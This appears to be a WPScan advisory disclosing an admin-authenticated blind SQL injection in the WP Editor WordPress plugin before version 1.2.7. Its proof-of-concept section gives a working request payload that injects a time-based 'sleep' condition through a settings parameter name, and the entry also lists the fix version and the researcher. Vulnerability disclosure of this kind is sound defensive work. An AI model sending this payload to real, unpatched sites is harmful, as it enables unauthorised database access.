WordPress Plugin Vulnerabilities
WP Editor < 1.2.7 - Authenticated SQL injection
Description
The plugin did not sanitise or validate its setting fields leading to an authenticated (admin+) blind SQL injection issue via an arbitrary parameter when making a request to save the settings.
Proof of Concept
https://drive.google.com/file/d/1KT4lHePmYuX3_6jvA4AEQ1MVDwJBlZOO/view?usp=sharing payload: wp_editor_ajax_nonce_settings_main=bfcfabefa8&action=save_wpeditor_settings&submit=Save%20Settings&cm0s'/**/or/**/sleep(1)%23=cm0s
Affects Plugins
Fixed in 1.2.7 References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)
Submitter
khanh
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-02-01 (about 3 years ago)
Added
2021-02-01 (about 3 years ago)
Last Updated
2021-02-02 (about 3 years ago)
WPScan 